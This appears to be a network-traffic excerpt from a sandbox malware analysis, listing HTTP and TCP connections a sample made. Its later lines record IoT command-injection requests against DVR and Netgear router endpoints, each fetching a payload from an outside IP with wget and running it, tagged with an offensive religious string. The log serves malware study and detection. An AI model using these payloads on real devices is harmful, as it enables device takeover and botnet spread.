Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.133.42.146Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 78.108.89.108Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 78.108.89.108Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 212.109.199.81Connection: close
Source: unknown TCP traffic detected without corresponding DNS query: 51.190.246.255
Source: unknown TCP traffic detected without corresponding DNS query: 223.37.116.194
Source: unknown TCP traffic detected without corresponding DNS query: 152.34.214.186
Source: unknown TCP traffic detected without corresponding DNS query: 76.157.216.254
Source: unknown TCP traffic detected without corresponding DNS query: 78.34.78.221
Source: unknown TCP traffic detected without corresponding DNS query: 38.163.35.48
Source: unknown TCP traffic detected without corresponding DNS query: 51.200.125.114
Source: unknown TCP traffic detected without corresponding DNS query: 187.188.98.76
Source: unknown TCP traffic detected without corresponding DNS query: 52.141.82.96
Source: unknown TCP traffic detected without corresponding DNS query: 43.40.222.255
Source: unknown TCP traffic detected without corresponding DNS query: 87.240.0.207
Source: unknown TCP traffic detected without corresponding DNS query: 115.121.179.133
Source: unknown TCP traffic detected without corresponding DNS query: 220.226.219.233
Source: unknown TCP traffic detected without corresponding DNS query: 191.109.8.122
Source: unknown TCP traffic detected without corresponding DNS query: 96.201.207.140
Source: unknown TCP traffic detected without corresponding DNS query: 99.40.172.188
Source: unknown TCP traffic detected without corresponding DNS query: 150.16.53.166
Source: unknown TCP traffic detected without corresponding DNS query: 71.176.24.47
Source: unknown TCP traffic detected without corresponding DNS query: 81.195.159.34
Source: unknown TCP traffic detected without corresponding DNS query: 207.155.249.218
Source: unknown TCP traffic detected without corresponding DNS query: 67.202.189.200
Source: unknown TCP traffic detected without corresponding DNS query: 58.235.188.113
Source: unknown TCP traffic detected without corresponding DNS query: 105.101.217.112
Source: unknown TCP traffic detected without corresponding DNS query: 142.14.158.122
Source: unknown TCP traffic detected without corresponding DNS query: 51.8.44.120
Source: unknown TCP traffic detected without corresponding DNS query: 129.26.61.232
Source: unknown TCP traffic detected without corresponding DNS query: 152.128.159.246
Source: unknown TCP traffic detected without corresponding DNS query: 81.107.157.185
Source: unknown TCP traffic detected without corresponding DNS query: 122.172.150.76
Source: unknown TCP traffic detected without corresponding DNS query: 94.144.24.251
Source: unknown TCP traffic detected without corresponding DNS query: 27.218.215.48
Source: unknown TCP traffic detected without corresponding DNS query: 138.131.117.60
Source: unknown TCP traffic detected without corresponding DNS query: 84.95.117.146
Source: unknown TCP traffic detected without corresponding DNS query: 170.46.71.147
Source: unknown TCP traffic detected without corresponding DNS query: 196.3.47.213
Source: unknown TCP traffic detected without corresponding DNS query: 14.205.71.236
Source: unknown TCP traffic detected without corresponding DNS query: 142.160.130.228
Source: unknown TCP traffic detected without corresponding DNS query: 116.145.208.169
Source: unknown TCP traffic detected without corresponding DNS query: 123.35.136.185
Source: unknown TCP traffic detected without corresponding DNS query: 38.23.109.52
Source: unknown TCP traffic detected without corresponding DNS query: 47.77.174.189
Source: unknown TCP traffic detected without corresponding DNS query: 158.162.176.151
Source: unknown TCP traffic detected without corresponding DNS query: 66.132.149.21
Source: unknown TCP traffic detected without corresponding DNS query: 75.139.230.139
Source: unknown TCP traffic detected without corresponding DNS query: 203.45.133.166
Source: unknown TCP traffic detected without corresponding DNS query: 79.177.2.110
Source: unknown TCP traffic detected without corresponding DNS query: 57.45.143.2
Source: unknown TCP traffic detected without corresponding DNS query: 60.188.211.229
Source: unknown TCP traffic detected without corresponding DNS query: 204.47.180.4
Source: unknown TCP traffic detected without corresponding DNS query: 140.8.98.78
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 104.21.15.57Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.153.249Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.37Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.37Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.37Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.37Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.37Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.37Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.51Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.68Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.51Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.68Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.68Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.51Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.68Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.51Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.51Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.51Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.67Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.67Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.67Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.67Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.67Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.67Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.68Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.68Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.147Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.147Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.147Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.138Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.138Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.138Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.138Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.138Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.138Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.105Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.105Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.105Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.105Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.105Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.105Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.195Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.195Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 46.30.40.105Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.128Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.128Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 46.30.40.105Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 46.30.40.105Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 46.30.40.105Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 46.30.40.105Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 46.30.40.105Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 109.248.201.170Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.128Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.128Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.128Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.128Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.129Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.129Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.129Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.129Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.129Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.129Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.195Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.195Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.195Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.195Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.209Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.209Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.209Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.209Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.209Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.209Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
